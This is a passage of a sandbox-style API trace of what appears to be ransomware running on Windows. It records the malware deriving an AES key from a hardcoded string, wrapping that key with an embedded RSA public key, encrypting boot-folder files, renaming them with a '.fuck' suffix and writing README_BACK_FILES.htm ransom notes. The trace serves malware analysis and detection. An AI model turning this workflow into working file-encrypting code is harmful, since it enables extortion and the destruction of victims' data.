hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.715] FindClose (in: hFindFile=0x27ff4d8 | out: hFindFile=0x27ff4d8) returned 1 [0140.715] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\README_BACK_FILES.htm" (normalized: "c:\\boot\\zh-hk\\readme_back_files.htm")) returned 0xffffffff [0140.715] AreFileApisANSI () returned 1 [0140.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.715] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK\\README_BACK_FILES.htm" (normalized: "c:\\boot\\zh-hk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.716] GetFileType (hFile=0x5d50) returned 0x1 [0140.717] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.717] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.718] FindFirstFileA (in: lpFileName="C:\\\\Boot\\zh-TW\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff218 [0140.718] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.718] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.718] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.718] GetLastError () returned 0x0 [0140.718] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui")) returned 0x20 [0140.718] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.718] CreateFileA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.719] CreateFileA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.719] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.720] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2813d90) returned 1 [0140.730] CryptCreateHash (in: hProv=0x2813d90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.730] lstrlenA (lpString="qCzPOYIfMqMxshdEtSqiohlizMlQm") returned 29 [0140.730] CryptHashData (hHash=0x27ff5d8, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.730] CryptDeriveKey (in: hProv=0x2813d90, Algid=0x6610, hBaseData=0x27ff5d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff358) returned 1 [0140.730] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.730] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.731] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2813f28) returned 1 [0140.734] CryptImportPublicKeyInfo (in: hCryptProv=0x2813f28, dwCertEncodingType=0x1, pInfo=0x28182c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28182f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2818300*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fec58) returned 1 [0140.734] CryptEncrypt (in: hKey=0x27fec58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.734] CryptEncrypt (in: hKey=0x27fec58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2813e18*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2813e18*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.734] WriteFile (in: hFile=0x5d54, lpBuffer=0x2813e18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2813e18*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.735] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.735] CryptEncrypt (in: hKey=0x27ff358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.735] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.735] CloseHandle (hObject=0xffffffff) returned 1 [0140.735] CloseHandle (hObject=0x5d54) returned 1 [0140.736] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.740] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.740] DeleteFileA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.gsg")) returned 1 [0140.741] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.fuck")) returned 0 [0140.741] CryptDestroyHash (hHash=0x27ff5d8) returned 1 [0140.741] CryptDestroyKey (hKey=0x27ff358) returned 1 [0140.741] CryptReleaseContext (hProv=0x2813d90, dwFlags=0x0) returned 1 [0140.741] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.741] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.741] GetLastError () returned 0x5 [0140.742] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui")) returned 0x20 [0140.742] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0140.742] CreateFileA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.742] CreateFileA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.742] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.743] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x28138c8) returned 1 [0140.755] CryptCreateHash (in: hProv=0x28138c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.755] lstrlenA (lpString="qCzPOYIfMqMxshdEtSqiohlizMlQm") returned 29 [0140.755] CryptHashData (hHash=0x27ff358, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.755] CryptDeriveKey (in: hProv=0x28138c8, Algid=0x6610, hBaseData=0x27ff358, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0140.755] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.755] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.755] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2813d08) returned 1 [0140.759] CryptImportPublicKeyInfo (in: hCryptProv=0x2813d08, dwCertEncodingType=0x1, pInfo=0x2817f88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2817fb8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2817fc0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fedd8) returned 1 [0140.759] CryptEncrypt (in: hKey=0x27fedd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.759] CryptEncrypt (in: hKey=0x27fedd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28131e0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x28131e0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.759] WriteFile (in: hFile=0x5d54, lpBuffer=0x28131e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x28131e0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.760] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.760] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.760] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.760] CloseHandle (hObject=0xffffffff) returned 1 [0140.760] CloseHandle (hObject=0x5d54) returned 1 [0140.763] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0140.767] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0140.767] DeleteFileA (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.gsg")) returned 1 [0140.768] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.fuck")) returned 0 [0140.769] CryptDestroyHash (hHash=0x27ff358) returned 1 [0140.769] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.769] CryptReleaseContext (hProv=0x28138c8, dwFlags=0x0) returned 1 [0140.769] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.769] FindClose (in: hFindFile=0x27ff218 | out: hFindFile=0x27ff218) returned 1 [0140.769] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\README_BACK_FILES.htm" (normalized: "c:\\boot\\zh-tw\\readme_back_files.htm")) returned 0xffffffff [0140.769] AreFileApisANSI () returned 1 [0140.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d750, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.769] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW\\README_BACK_FILES.htm" (normalized: "c:\\boot\\zh-tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.771] GetFileType (hFile=0x5d50) returned 0x1 [0140.771] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.772] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 0 [0140.772] FindClose (in: hFindFile=0x69d8e8 | out: hFindFile=0x69d8e8) returned 1 [0140.772] GetFileAttributesA (lpFileName="C:\\\\Boot\\README_BACK_FILES.htm" (normalized: "c:\\boot\\readme_back_files.htm")) returned 0xffffffff [0140.772] AreFileApisANSI () returned 1 [0140.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5bc930, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0140.772] CreateFileW (lpFileName="C:\\\\Boot\\README_BACK_FILES.htm" (normalized: "c:\\boot\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5fa1c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0140.772] GetFileType (hFile=0x5cdc) returned 0x1 [0140.773] WriteFile (in: hFile=0x5cdc, lpBuffer=0x2c5e668*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e660, lpOverlapped=0x0 | out: lpBuffer=0x2c5e668*, lpNumberOfBytesWritten=0x2c5e660*=0x5ec, lpOverlapped=0x0) returned 1 [0140.774] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0140.774] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0140.774] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0140.774] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5fb44 | out: lpSystemTimeAsFileTime=0x2c5fb44) [0140.774] GetLastError () returned 0x0 [0140.774] GetFileAttributesA (lpFileName="C:\\\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0140.775] SetFileAttributesA (lpFileName="C:\\\\BOOTSECT.BAK", dwFileAttributes=0x80) returned 1 [0140.775] CreateFileA (lpFileName="C:\\\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0140.775] CreateFileA (lpFileName="C:\\\\BOOTSECT.BAK.gsg" (normalized: "c:\\bootsect.bak.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.776] SetFileAttributesA (lpFileName="C:\\\\BOOTSECT.BAK.gsg", dwFileAttributes=0x2) returned 1 [0140.776] CryptAcquireContextA (in: phProv=0x2c5eb40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5eb40*=0x2813bf8) returned 1 [0140.788] CryptCreateHash (in: hProv=0x2813bf8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5eb44 | out: phHash=0x2c5eb44) returned 1 [0140.788] lstrlenA (lpString="qCzPOYIfMqMxshdEtSqiohlizMlQm") returned 29 [0140.788] CryptHashData (hHash=0x27ff358, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.788] CryptDeriveKey (in: hProv=0x2813bf8, Algid=0x6610, hBaseData=0x27ff358, dwFlags=0x1000000, phKey=0x2c5eb30 | out: phKey=0x2c5eb30*=0x27ff4d8) returned 1 [0140.788] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5eb4c, pcbBinary=0x2c5eb2c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5eb4c, pcbBinary=0x2c5eb2c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.788] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5eb4c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5eb20, pcbStructInfo=0x2c5eb28 | out: pvStructInfo=0x2c5eb20, pcbStructInfo=0x2c5eb28) returned 1 [0140.788] CryptAcquireContextA (in: phProv=0x2c5eb3c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5eb3c*=0x2813d90) returned 1 [0140.791] CryptImportPublicKeyInfo (in: hCryptProv=0x2813d90, dwCertEncodingType=0x1, pInfo=0x2817eb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2817ee8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2817ef0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5eb34 | out: phKey=0x2c5eb34*=0x27ff5d8) returned 1 [0140.791] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5eb24*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5eb24*=0x80) returned 1 [0140.791] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2813b70*, pdwDataLen=0x2c5eb38*=0x18, dwBufLen=0x80 | out: pbData=0x2813b70*, pdwDataLen=0x2c5eb38*=0x80) returned 1 [0140.792] WriteFile (in: hFile=0x5d50, lpBuffer=0x2813b70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x2813b70*, lpNumberOfBytesWritten=0x2c5eb48*=0x80, lpOverlapped=0x0) returned 1 [0140.792] ReadFile (in: hFile=0x5cdc, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.821] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380) returned 1 [0140.821] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.826] ReadFile (in: hFile=0x5cdc, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.826] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380) returned 1 [0140.826] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.826] ReadFile (in: hFile=0x5cdc, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.826] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380) returned 1 [0140.826] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.826] ReadFile (in: hFile=0x5cdc, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.827] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380) returned 1 [0140.827] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.827] ReadFile (in: hFile=0x5cdc, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.892] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380) returned 1 [0140.892] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.893] ReadFile (in: hFile=0x5cdc, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.893] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380) returned 1 [0140.893] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.893] ReadFile (in: hFile=0x5cdc, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, 